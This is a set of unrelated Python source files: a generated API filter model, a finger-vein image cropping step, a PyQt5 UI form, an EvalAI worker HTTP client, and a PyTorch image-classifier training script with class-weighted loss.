"""Gets the agent_type of this GetAgentsRequestFilterV1. # noqa: E501
:return: The agent_type of this GetAgentsRequestFilterV1. # noqa: E501
:rtype: list[GetAgentsRequestFilterAgentTypeV1]
"""
return self._agent_type
@agent_type.setter
def agent_type(self, agent_type):
"""Sets the agent_type of this GetAgentsRequestFilterV1.
:param agent_type: The agent_type of this GetAgentsRequestFilterV1. # noqa: E501
:type: list[GetAgentsRequestFilterAgentTypeV1]
"""
self._agent_type = agent_type
@property
def agent_version(self):
"""Gets the agent_version of this GetAgentsRequestFilterV1. # noqa: E501
:return: The agent_version of this GetAgentsRequestFilterV1. # noqa: E501
:rtype: list[str]
"""
return self._agent_version
@agent_version.setter
def agent_version(self, agent_version):
"""Sets the agent_version of this GetAgentsRequestFilterV1.
:param agent_version: The agent_version of this GetAgentsRequestFilterV1. # noqa: E501
:type: list[str]
"""
self._agent_version = agent_version
@property
def agent_tag_name(self):
"""Gets the agent_tag_name of this GetAgentsRequestFilterV1. # noqa: E501
:return: The agent_tag_name of this GetAgentsRequestFilterV1. # noqa: E501
:rtype: list[str]
"""
return self._agent_tag_name
@agent_tag_name.setter
def agent_tag_name(self, agent_tag_name):
"""Sets the agent_tag_name of this GetAgentsRequestFilterV1.
:param agent_tag_name: The agent_tag_name of this GetAgentsRequestFilterV1. # noqa: E501
:type: list[str]
"""
self._agent_tag_name = agent_tag_name
@property
def agent_status(self):
"""Gets the agent_status of this GetAgentsRequestFilterV1. # noqa: E501
:return: The agent_status of this GetAgentsRequestFilterV1. # noqa: E501
:rtype: list[GetAgentsRequestFilterAgentStatusV1]
"""
return self._agent_status
@agent_status.setter
def agent_status(self, agent_status):
"""Sets the agent_status of this GetAgentsRequestFilterV1.
:param agent_status: The agent_status of this GetAgentsRequestFilterV1. # noqa: E501
:type: list[GetAgentsRequestFilterAgentStatusV1]
"""
self._agent_status = agent_status
@property
def agent_location_country(self):
"""Gets the agent_location_country of this GetAgentsRequestFilterV1. # noqa: E501
:return: The agent_location_country of this GetAgentsRequestFilterV1. # noqa: E501
:rtype: list[str]
"""
return self._agent_location_country
@agent_location_country.setter
def agent_location_country(self, agent_location_country):
"""Sets the agent_location_country of this GetAgentsRequestFilterV1.
:param agent_location_country: The agent_location_country of this GetAgentsRequestFilterV1. # noqa: E501
:type: list[str]
"""
self._agent_location_country = agent_location_country
@property
def agent_modified_at_from(self):
"""Gets the agent_modified_at_from of this GetAgentsRequestFilterV1. # noqa: E501
:return: The agent_modified_at_from of this GetAgentsRequestFilterV1. # noqa: E501
:rtype: datetime
"""
return self._agent_modified_at_from
@agent_modified_at_from.setter
def agent_modified_at_from(self, agent_modified_at_from):
"""Sets the agent_modified_at_from of this GetAgentsRequestFilterV1.
:param agent_modified_at_from: The agent_modified_at_from of this GetAgentsRequestFilterV1. # noqa: E501
:type: datetime
"""
self._agent_modified_at_from = agent_modified_at_from
@property
def agent_modified_at_to(self):
"""Gets the agent_modified_at_to of this GetAgentsRequestFilterV1. # noqa: E501
:return: The agent_modified_at_to of this GetAgentsRequestFilterV1. # noqa: E501
:rtype: datetime
"""
return self._agent_modified_at_to
@agent_modified_at_to.setter
def agent_modified_at_to(self, agent_modified_at_to):
"""Sets the agent_modified_at_to of this GetAgentsRequestFilterV1.
:param agent_modified_at_to: The agent_modified_at_to of this GetAgentsRequestFilterV1. # noqa: E501
:type: datetime
"""
self._agent_modified_at_to = agent_modified_at_to
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(
map(lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value)
)
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(
map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict")
else item,
value.items(),
)
)
else:
result[attr] = value
if issubclass(GetAgentsRequestFilterV1, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, GetAgentsRequestFilterV1):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
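# Brief usage sketch (added for illustration; attribute names follow the
# swagger_types mapping defined above):
#
#     flt = GetAgentsRequestFilterV1(agent_id=[1.0], agent_version=["1.2.3"])
#     payload = flt.to_dict()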
|
from IProcess import IProcess, EDataType
from PIL import Image
import numpy as np
import math
import cv2
class CropImageByClass(IProcess):
def __init__(self):
IProcess.__init__(self)
self.cropped = True
def getType(self):
return EDataType.CroppedPic
def toId(self):
return str(__class__.__name__)
def do(self, imageData):
IProcess.do(self, imageData)
self.data = [] # Delete previous data.
className = imageData.classifiedAs
img = np.array(imageData.data[0]) # STUB: Only tested with grayscale images.
maxarea = 0
max2 = 0
'''
PARAMETERS for classes:
'''
minThresholdValue = 0
maxThresholdValue = 255
rectangleThreshold = 0.5
cropRatio = [ 1.0, 1.0, 1.0, 1.0] #y, h, x, w
invertImage = False
if "FV-USM" in className:
minThresholdValue = 40
rectangleThreshold = 0.05
cropRatio = [ 0.35, 0.75, 0.15, 0.8 ]
elif "HKPU-FV" in className:
minThresholdValue = 45
rectangleThreshold = 0.95
cropRatio = [ 0.36, 0.67, 0.15, 0.7 ]
invertImage = True
elif "IDIAP" in className:
minThresholdValue = 45
rectangleThreshold = 0.85
cropRatio = [ 0.3, 0.7, 0.15, 0.8 ]
elif "MMCBNU_6000" in className:
minThresholdValue = 20
rectangleThreshold = 0.8
cropRatio = [ 0.17, 0.84, 0.0, 0.8 ]
elif "PLUS-FV3-Laser_PALMAR" in className:
minThresholdValue = 40
rectangleThreshold = 0.2
cropRatio = [ 0.25, 0.55, 0.4, 0.6 ]
elif "SCUT_FVD" in className:
minThresholdValue = 70
rectangleThreshold = 0.6
cropRatio = [ 0.25, 0.9, 0.3, 0.75 ]
elif "SDUMLA-HMT" in className:
minThresholdValue = 50
rectangleThreshold = 0.3
cropRatio = [ 0.3, 0.75, 0.05, 0.9 ]
elif "THU-FVFDT" in className:
minThresholdValue = 65
rectangleThreshold = 0.22
cropRatio = [ 0.2, 0.7, 0.43, 0.68 ]
elif "UTFVP" in className:
minThresholdValue = 40
rectangleThreshold = 0.5
cropRatio = [ 0.3, 0.65, 0.0, 0.8 ]
else:
raise Exception("Cropping class "+className+" not implemented!")
if invertImage:
img = ~img
ret, threshed_img = cv2.threshold(img, minThresholdValue, maxThresholdValue, cv2.THRESH_BINARY)
contours, hier = cv2.findContours(threshed_img, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
        (imHeight, imWidth) = img.shape
imArea = imWidth * imHeight
framemax = None
frame2 = None
for c in contours:
# get the bounding rect
x, y, w, h = cv2.boundingRect(c)
# draw a green rectangle to visualize the bounding rect
#cv2.rectangle(img, (x, y), (x+w, y+h), (255, 255, 255), 2)
area = w * h
if area > maxarea:
max2 = maxarea
maxarea = area
framemax = (x,y, w, h)
if not frame2:
frame2 = framemax
elif area > max2:
max2 = area
frame2 = (x, y, w, h)
spaceA = (1.0 / imArea * maxarea)
spaceB = (1.0 / imArea * max2)
if spaceA >= rectangleThreshold:
frame2 = framemax
#print("Framemax has"+str(spaceA)+" percent space!")
elif spaceB >= rectangleThreshold:
framemax = frame2
#print("Frame2 has"+str(spaceB)+" percent space!")
#if framemax[1] > frame2[1]:
# uborder = cv2.line(img, (framemax[0], framemax[1]+framemax[3]), (framemax[0]+framemax[2], framemax[1]+framemax[3]), (255, 0, 0), 1)
# oborder = cv2.line(img, (frame2[0], frame2[1]),(frame2[0]+frame2[2], frame2[1]), (255, 0, 0), 1)
size = img.shape
if "MMCBNU_6000" in className:
cropX = 0
cropWidth = size[1]
cropY = framemax[1]
cropHeight = 0 + (framemax[1]+framemax[3])
# elif "PLUS-FV3-Laser_PALMAR" in className:
# cropX = framemax[0]
# cropWidth = framemax[0]+framemax[2]
# cropY = framemax[1]
        #     cropHeight = 0 + (framemax[1]+framemax[3])
elif "SDUMLA-HMT" in className:
cropX = 0
cropWidth = size[1] - 1
cropY = frame2[1]
cropHeight = 0 + (framemax[1]+framemax[3])
elif "SCUT_FVD" in className:
cropX = framemax[0]
cropWidth = framemax[0] + framemax[2]
cropY = framemax[1]
cropHeight = framemax[1] + framemax[3]
elif "THU-FVFDT" in className:
cropX = framemax[0]
cropWidth = framemax[0] + framemax[2]
cropY = framemax[1]
cropHeight = framemax[1] + framemax[3]
else:
cropX = 0
cropWidth = size[1]
cropY = frame2[1]
cropHeight = 0 + (framemax[1]+framemax[3])
'''
if cropY >= imHeight:
print("Fehler 1")
if cropHeight >= imHeight:
print("Fehler 2")
if cropWidth >= imWidth:
#cropWidth = imWidth - 1
print("Fehler 3! KORRIGIERT")
'''
crop_img = img[cropY : cropHeight, cropX : cropWidth]
partHeight, partWidth = crop_img.shape
part_img = crop_img[math.floor(partHeight * cropRatio[0]): math.floor(partHeight * cropRatio[1]), math.floor(partWidth * cropRatio[2]): math.floor(partWidth * cropRatio[3])]
if invertImage:
part_img = ~part_img
self.data = [ Image.fromarray(part_img) ]
return self
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'GeneratorControl.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_GeneratorControlMain(object):
def setupUi(self, GeneratorControlMain):
GeneratorControlMain.setObjectName("GeneratorControlMain")
GeneratorControlMain.resize(1020, 920)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(GeneratorControlMain.sizePolicy().hasHeightForWidth())
GeneratorControlMain.setSizePolicy(sizePolicy)
self.centralwidget = QtWidgets.QWidget(GeneratorControlMain)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.MinimumExpanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.centralwidget.sizePolicy().hasHeightForWidth())
self.centralwidget.setSizePolicy(sizePolicy)
self.centralwidget.setObjectName("centralwidget")
self.sepLine = QtWidgets.QFrame(self.centralwidget)
self.sepLine.setGeometry(QtCore.QRect(10, 150, 1001, 16))
self.sepLine.setFrameShadow(QtWidgets.QFrame.Raised)
self.sepLine.setFrameShape(QtWidgets.QFrame.HLine)
self.sepLine.setObjectName("sepLine")
self.layoutWidget = QtWidgets.QWidget(self.centralwidget)
self.layoutWidget.setGeometry(QtCore.QRect(10, 830, 1001, 41))
self.layoutWidget.setObjectName("layoutWidget")
self.btnsHLayout = QtWidgets.QHBoxLayout(self.layoutWidget)
self.btnsHLayout.setContentsMargins(0, 0, 0, 0)
self.btnsHLayout.setObjectName("btnsHLayout")
spacerItem = QtWidgets.QSpacerItem(30, 20, QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Minimum)
self.btnsHLayout.addItem(spacerItem)
self.insideBtnsHLayout = QtWidgets.QHBoxLayout()
self.insideBtnsHLayout.setObjectName("insideBtnsHLayout")
self.saveBtn = QtWidgets.QPushButton(self.layoutWidget)
self.saveBtn.setObjectName("saveBtn")
self.insideBtnsHLayout.addWidget(self.saveBtn)
self.runBtn = QtWidgets.QPushButton(self.layoutWidget)
self.runBtn.setObjectName("runBtn")
self.insideBtnsHLayout.addWidget(self.runBtn)
self.exitBtn = QtWidgets.QPushButton(self.layoutWidget)
self.exitBtn.setObjectName("exitBtn")
self.insideBtnsHLayout.addWidget(self.exitBtn)
self.btnsHLayout.addLayout(self.insideBtnsHLayout)
spacerItem1 = QtWidgets.QSpacerItem(30, 20, QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Minimum)
self.btnsHLayout.addItem(spacerItem1)
self.layoutWidget1 = QtWidgets.QWidget(self.centralwidget)
self.layoutWidget1.setGeometry(QtCore.QRect(10, 10, 1001, 140))
self.layoutWidget1.setObjectName("layoutWidget1")
self.topHLayout = QtWidgets.QHBoxLayout(self.layoutWidget1)
self.topHLayout.setContentsMargins(0, 0, 0, 0)
self.topHLayout.setObjectName("topHLayout")
self.fileVLayout = QtWidgets.QVBoxLayout()
self.fileVLayout.setObjectName("fileVLayout")
self.file1HLayout = QtWidgets.QHBoxLayout()
self.file1HLayout.setObjectName("file1HLayout")
self.execHintLabel = QtWidgets.QLabel(self.layoutWidget1)
font = QtGui.QFont()
font.setPointSize(18)
self.execHintLabel.setFont(font)
self.execHintLabel.setObjectName("execHintLabel")
self.file1HLayout.addWidget(self.execHintLabel)
self.execPathEdit = QtWidgets.QLineEdit(self.layoutWidget1)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(3)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.execPathEdit.sizePolicy().hasHeightForWidth())
self.execPathEdit.setSizePolicy(sizePolicy)
self.execPathEdit.setObjectName("execPathEdit")
self.file1HLayout.addWidget(self.execPathEdit)
self.findExecBtn = QtWidgets.QToolButton(self.layoutWidget1)
self.findExecBtn.setObjectName("findExecBtn")
self.file1HLayout.addWidget(self.findExecBtn)
self.file1HLayout.setStretch(0, 3)
self.file1HLayout.setStretch(1, 3)
self.file1HLayout.setStretch(2, 3)
self.fileVLayout.addLayout(self.file1HLayout)
spacerItem2 = QtWidgets.QSpacerItem(20, 20, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Maximum)
self.fileVLayout.addItem(spacerItem2)
self.file2HLayout = QtWidgets.QHBoxLayout()
self.file2HLayout.setObjectName("file2HLayout")
self.saveAsLabel = QtWidgets.QLabel(self.layoutWidget1)
font = QtGui.QFont()
font.setPointSize(18)
self.saveAsLabel.setFont(font)
self.saveAsLabel.setObjectName("saveAsLabel")
self.file2HLayout.addWidget(self.saveAsLabel)
self.inputPathEdit = QtWidgets.QLineEdit(self.layoutWidget1)
self.inputPathEdit.setObjectName("inputPathEdit")
self.file2HLayout.addWidget(self.inputPathEdit)
self.loadBtn = QtWidgets.QToolButton(self.layoutWidget1)
self.loadBtn.setObjectName("loadBtn")
self.file2HLayout.addWidget(self.loadBtn)
self.fileVLayout.addLayout(self.file2HLayout)
self.fileVLayout.setStretch(0, 3)
self.fileVLayout.setStretch(1, 3)
self.fileVLayout.setStretch(2, 3)
self.topHLayout.addLayout(self.fileVLayout)
spacerItem3 = QtWidgets.QSpacerItem(20, 20, QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)
self.topHLayout.addItem(spacerItem3)
self.logoLabel = QtWidgets.QLabel(self.layoutWidget1)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.logoLabel.sizePolicy().hasHeightForWidth())
self.logoLabel.setSizePolicy(sizePolicy)
self.logoLabel.setObjectName("logoLabel")
self.topHLayout.addWidget(self.logoLabel)
self.layoutWidget2 = QtWidgets.QWidget(self.centralwidget)
self.layoutWidget2.setGeometry(QtCore.QRect(10, 170, 1001, 651))
self.layoutWidget2.setObjectName("layoutWidget2")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.layoutWidget2)
self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.paramLabel = QtWidgets.QLabel(self.layoutWidget2)
self.paramLabel.setEnabled(True)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.paramLabel.sizePolicy().hasHeightForWidth())
self.paramLabel.setSizePolicy(sizePolicy)
font = QtGui.QFont()
font.setPointSize(18)
self.paramLabel.setFont(font)
self.paramLabel.setObjectName("paramLabel")
self.verticalLayout_2.addWidget(self.paramLabel)
self.paramTableWidget = QtWidgets.QTableWidget(self.layoutWidget2)
font = QtGui.QFont()
font.setPointSize(16)
self.paramTableWidget.setFont(font)
self.paramTableWidget.setColumnCount(6)
self.paramTableWidget.setObjectName("paramTableWidget")
self.paramTableWidget.setRowCount(0)
self.verticalLayout_2.addWidget(self.paramTableWidget)
GeneratorControlMain.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(GeneratorControlMain)
self.menubar.setGeometry(QtCore.QRect(0, 0, 1020, 22))
self.menubar.setObjectName("menubar")
GeneratorControlMain.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(GeneratorControlMain)
self.statusbar.setObjectName("statusbar")
GeneratorControlMain.setStatusBar(self.statusbar)
self.retranslateUi(GeneratorControlMain)
QtCore.QMetaObject.connectSlotsByName(GeneratorControlMain)
GeneratorControlMain.setTabOrder(self.execPathEdit, self.findExecBtn)
GeneratorControlMain.setTabOrder(self.findExecBtn, self.inputPathEdit)
GeneratorControlMain.setTabOrder(self.inputPathEdit, self.loadBtn)
GeneratorControlMain.setTabOrder(self.loadBtn, self.paramTableWidget)
GeneratorControlMain.setTabOrder(self.paramTableWidget, self.saveBtn)
GeneratorControlMain.setTabOrder(self.saveBtn, self.runBtn)
GeneratorControlMain.setTabOrder(self.runBtn, self.exitBtn)
def retranslateUi(self, GeneratorControlMain):
_translate = QtCore.QCoreApplication.translate
GeneratorControlMain.setWindowTitle(_translate("GeneratorControlMain", "MainWindow"))
self.saveBtn.setText(_translate("GeneratorControlMain", "Save"))
self.runBtn.setText(_translate("GeneratorControlMain", "Run"))
self.exitBtn.setText(_translate("GeneratorControlMain", "Exit"))
        self.execHintLabel.setText(_translate("GeneratorControlMain", "Specify the generator executable location:"))
self.findExecBtn.setText(_translate("GeneratorControlMain", "..."))
self.saveAsLabel.setText(_translate("GeneratorControlMain", "Load file (leave blank if saving to a new one):"))
self.loadBtn.setText(_translate("GeneratorControlMain", "..."))
self.logoLabel.setText(_translate("GeneratorControlMain", "<html><head/><body><p><img src=\":/newPrefix/logo_hi_res.jpg\" width=\"220\" height=\"110\"/></p><p> Author: Ao Liu</p></body></html>"))
self.paramLabel.setText(_translate("GeneratorControlMain", "Table of parameters: "))
import Logo_rc
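# --- Hedged usage sketch (not part of the generated UI file) ---
# Shows how a pyuic-style Ui class is typically attached to a QMainWindow.
# The class name Ui_GeneratorControlMain is assumed from the standard pyuic
# naming convention and may differ in the actual module.
if __name__ == "__main__":
    import sys
    app = QtWidgets.QApplication(sys.argv)
    main_window = QtWidgets.QMainWindow()
    ui = Ui_GeneratorControlMain()  # assumed class name
    ui.setupUi(main_window)
    main_window.show()
    sys.exit(app.exec_())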
|
import logging
import requests
logger = logging.getLogger(__name__)
URLS = {
"get_message_from_sqs_queue": "/api/jobs/challenge/queues/{}/",
"delete_message_from_sqs_queue": "/api/jobs/queues/{}/",
"get_submission_by_pk": "/api/jobs/submission/{}",
"get_challenge_phases_by_challenge_pk": "/api/challenges/{}/phases/",
"get_challenge_by_queue_name": "/api/challenges/challenge/queues/{}/",
"get_challenge_phase_by_pk": "/api/challenges/challenge/{}/challenge_phase/{}",
"update_submission_data": "/api/jobs/challenge/{}/update_submission/",
"get_aws_eks_bearer_token": "/api/jobs/challenge/{}/eks_bearer_token/",
"get_aws_eks_cluster_details": "/api/challenges/{}/evaluation_cluster/",
}
class EvalAI_Interface:
def __init__(self, AUTH_TOKEN, EVALAI_API_SERVER, QUEUE_NAME):
self.AUTH_TOKEN = AUTH_TOKEN
self.EVALAI_API_SERVER = EVALAI_API_SERVER
self.QUEUE_NAME = QUEUE_NAME
def get_request_headers(self):
headers = {"Authorization": "Token {}".format(self.AUTH_TOKEN)}
return headers
def make_request(self, url, method, data=None):
headers = self.get_request_headers()
try:
response = requests.request(
method=method, url=url, headers=headers, data=data
)
response.raise_for_status()
except requests.exceptions.RequestException:
logger.info(
"The worker is not able to establish connection with EvalAI"
)
raise
return response.json()
def return_url_per_environment(self, url):
base_url = "{0}".format(self.EVALAI_API_SERVER)
url = "{0}{1}".format(base_url, url)
return url
def get_message_from_sqs_queue(self):
url = URLS.get("get_message_from_sqs_queue").format(self.QUEUE_NAME)
url = self.return_url_per_environment(url)
response = self.make_request(url, "GET")
return response
def delete_message_from_sqs_queue(self, receipt_handle):
url = URLS.get("delete_message_from_sqs_queue").format(self.QUEUE_NAME)
url = self.return_url_per_environment(url)
data = {"receipt_handle": receipt_handle}
response = self.make_request(url, "POST", data) # noqa
return response
def get_submission_by_pk(self, submission_pk):
url = URLS.get("get_submission_by_pk").format(submission_pk)
url = self.return_url_per_environment(url)
response = self.make_request(url, "GET")
return response
def get_challenge_phases_by_challenge_pk(self, challenge_pk):
url = URLS.get("get_challenge_phases_by_challenge_pk").format(
challenge_pk
)
url = self.return_url_per_environment(url)
response = self.make_request(url, "GET")
return response
def get_challenge_by_queue_name(self):
url = URLS.get("get_challenge_by_queue_name").format(self.QUEUE_NAME)
url = self.return_url_per_environment(url)
response = self.make_request(url, "GET")
return response
def get_challenge_phase_by_pk(self, challenge_pk, challenge_phase_pk):
url = URLS.get("get_challenge_phase_by_pk").format(
challenge_pk, challenge_phase_pk
)
url = self.return_url_per_environment(url)
response = self.make_request(url, "GET")
return response
def update_submission_data(self, data, challenge_pk, submission_pk):
url = URLS.get("update_submission_data").format(challenge_pk)
url = self.return_url_per_environment(url)
response = self.make_request(url, "PUT", data=data)
return response
def update_submission_status(self, data, challenge_pk):
url = URLS.get("update_submission_data").format(challenge_pk)
url = self.return_url_per_environment(url)
response = self.make_request(url, "PATCH", data=data)
return response
def get_aws_eks_bearer_token(self, challenge_pk):
url = URLS.get("get_aws_eks_bearer_token").format(challenge_pk)
url = self.return_url_per_environment(url)
response = self.make_request(url, "GET")
return response
def get_aws_eks_cluster_details(self, challenge_pk):
url = URLS.get("get_aws_eks_cluster_details").format(challenge_pk)
url = self.return_url_per_environment(url)
response = self.make_request(url, "GET")
return response
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
import torchvision
import torchvision.transforms as transforms
import numpy as np
import math
import matplotlib.pyplot as plt
import torch.optim as optim
from torch.utils.data import Dataset, DataLoader
from sklearn.metrics import confusion_matrix
use_cuda = torch.cuda.is_available()
print(use_cuda)
alpha=1 # AWC alpha for training
beta=1 # AWC beta for inference
gamma=0.9 # AWCnew <-- (1-gamma) * AWCcurrent + gamma * AWCpast
InitLR=0.05*10**(-2)
MinLR=InitLR*0.01
MaxEpoch=400
# calculate an initial loss
epoch=-1
running_loss = 0.0
LR_factor=1 # should be 1 for non-zero Lflag
HH=20
DR=0
batch_size = 1024
MODEL_PATH = './models/'
PLOT_PATH = './plot/'
PATH='ACW1H_'+ str(HH) +'_alpha'+ str(alpha) +'_beta'+ str(beta) +'_gamma'+ str(gamma)
PATH = PATH +'_lr'+ str(InitLR) +'_bs'+ str(batch_size) +'_dr'+ str(DR)
PATH_A = MODEL_PATH + PATH + '.pth'
MaxNoClasses=10
NoTrainSamples = [5000, 5000, 5000, 5000, 5000, 5000, 5000, 5000, 5000, 5000 ] # Imbalanced Data 1
#NoTrainSamples = [500, 1000, 1500, 2000, 2500, 3000, 3500, 4000, 4500, 5000] # Imbalanced Data 2
MaxNoTrainSamples=sum(NoTrainSamples)
NoTestSamples=[1000, 1000, 1000, 1000, 1000, 1000, 1000, 1000, 1000, 1000]
#NoTestSamples=[100, 200, 300, 400, 500, 600, 700, 800, 900, 1000] # set the proportion to the NoTrainSamples
MaxNoTestSamples=sum(NoTestSamples)
criterion = nn.CrossEntropyLoss() # has softmax already and class weights may be defined
class_prob = torch.FloatTensor(NoTrainSamples)
class_prob = class_prob / sum(class_prob)
class_weights = 1 / class_prob ** alpha # initialize class-weights
class_weights = class_weights / sum(class_weights)
num_classes = MaxNoClasses
number_per_class = {}
for i in range(num_classes):
number_per_class[i] = 0
from torchvision.datasets import ImageFolder
transform = transforms.Compose([transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])
trainset = ImageFolder(root='./data/Traindata-balanced', transform=transform)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=batch_size, shuffle=True, num_workers=2)
testset = ImageFolder(root='./data/Testdata-balanced', transform=transform)
testloader = torch.utils.data.DataLoader(testset, batch_size=batch_size, shuffle=True, num_workers=0)
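# Hedged note on the assumed data layout: torchvision's ImageFolder expects one
# sub-directory per class, e.g. ./data/Traindata-balanced/plane/xxx.png, and
# assigns labels from the sorted order of those directory names, so the classes
# tuple defined below should match that sorted order.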
classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
class Net(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(3, 6, 5)
        # may add batch normalization
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 16, 5)
self.fc1 = nn.Linear(16 * 5 * 5, 120)
self.fc2 = nn.Linear(120, HH)
self.fc3 = nn.Linear(HH, 10)
self.dropout = nn.Dropout(DR)
def forward(self, x):
x = self.pool(F.relu(self.conv1(x)))
x = self.pool(F.relu(self.conv2(x)))
        x = torch.flatten(x, 1)  # flatten all dimensions except the batch dimension
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
if DR > 0.0 :
x = self.dropout(x)
x = self.fc3(x)
return x
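# Hedged sanity check (illustrative, safe to remove): the network expects
# 3x32x32 inputs (CIFAR-10-sized images); a dummy forward pass confirms that
# the classifier emits one logit per class.
_probe_out = Net()(torch.zeros(1, 3, 32, 32))
assert _probe_out.shape == (1, 10)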
net = Net()
LR_list = []
train_loss_list = []
test_loss_list = []
iteration_list = []
train_class_acc_list=[]
test_class_acc_list=[]
train_class_loss_list=[]
test_class_loss_list=[]
accuracy_list = []
predictions_list = []
labels_list = []
train_total_acc_list = []
train_ave_class_acc_list = []
train_std_class_acc_list = []
test_total_acc_list = []
test_ave_class_acc_list = []
test_std_class_acc_list = []
# initial loss
LR=InitLR
print('Training Start')
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
print('device: ', device)
net.to(device)
if torch.cuda.device_count() > 1:
print('\n===> Training on GPU!')
net = nn.DataParallel(net)
for i, data in enumerate(trainloader, 0):
    # get the inputs; data is a list of [inputs, labels]
inputs, labels = data
inputs, labels = inputs.to(device), labels.to(device)
outputs = net(inputs)
loss = criterion(outputs, labels)
running_loss += loss.item()
# print loss for each epoch
print(epoch + 1, running_loss / MaxNoTrainSamples, LR)
# save loss
#train_loss_list.append(running_loss)
prev_loss = running_loss
LR_list.append(LR)
min_loss=999999
iepoch=0
optimizer = optim.SGD(net.parameters(), lr=InitLR, momentum=0.9)
for epoch in range(MaxEpoch):  # loop over the dataset multiple times
# training
running_loss = 0.0
correct_pred = {classname: 0 for classname in classes}
total_pred = {classname: 0 for classname in classes}
train_class_loss = torch.zeros(MaxNoClasses)
for i, data in enumerate(trainloader, 0):
        # get the inputs; data is a list of [inputs, labels]
inputs, labels = data
inputs, labels = inputs.to(device), labels.to(device)
        # zero the parameter gradients
optimizer.zero_grad()
        # forward + backward + optimize
outputs = net(inputs)
outputs = outputs.to(device)
class_weights = class_weights.to(device)
        criterion = nn.CrossEntropyLoss(weight=class_weights, reduction='none')  # per-sample losses ('reduce' is deprecated)
        # get total and class losses
loss = criterion(outputs, labels)
loss = loss.to(device)
for label, one_loss in zip(labels, loss):
train_class_loss = train_class_loss.to(device)
train_class_loss[label] += one_loss
# add loss
loss=sum(loss)
running_loss += loss.item()
# backprop and weight adjustment
loss.backward()
optimizer.step()
# check accuracy
_, predictions = torch.max(outputs, 1)
for label, prediction in zip(labels, predictions):
if label == prediction:
correct_pred[classes[label]] += 1
total_pred[classes[label]] += 1
# get lists
running_loss=running_loss/MaxNoTrainSamples
print('Training ',epoch + 1, running_loss, LR)
print("Class Weights: ",class_weights)
# save loss
train_loss_list.append(running_loss)
LR_list.append(LR)
# reduce learning rate if loss increases
if prev_loss < running_loss :
LR=LR*LR_factor
optimizer = optim.SGD(net.parameters(), lr=LR, momentum=0.9)
prev_loss = running_loss
# save the best model
if running_loss < min_loss :
min_loss=running_loss
PATH_B = MODEL_PATH + PATH +'_Best.pth'
#torch.save(net.state_dict(), PATH)
#torch.save(net, PATH_B)
# training accuracy check
# total and class accuracy
sum_correct_count = 0
sum_class_accuracy = 0
sum_class_acc_sq = 0
sum_total_count = 0
# get class accuracy
ii=0
train_class_acc_list.append([0,0,0,0,0,0,0,0,0,0])
for classname, correct_count in correct_pred.items():
accuracy = 100 * float(correct_count) / total_pred[classname]
#print(" Accuracy for class {:5s} is: {:.1f} %".format(classname,accuracy), end='')
print(' ',accuracy, end='')
sum_correct_count += correct_count
sum_total_count += total_pred[classname]
sum_class_accuracy += accuracy
sum_class_acc_sq += accuracy * accuracy
train_class_acc_list[iepoch][ii] = accuracy
ii += 1
print('')
    # average of class accuracies
total_accuracy = 100 * float(sum_correct_count) / sum_total_count
ave_class_accuracy = sum_class_accuracy / len(classes)
std_class_accuracy = math.sqrt(sum_class_acc_sq / len(classes) - ave_class_accuracy * ave_class_accuracy)
print(" Average Class Accuracy is: {:.1f} %".format(ave_class_accuracy))
print(" STD of Class Accuracy is: {:.1f} %".format(std_class_accuracy))
print(" Weighted Accuracy is: {:.1f} %".format(total_accuracy))
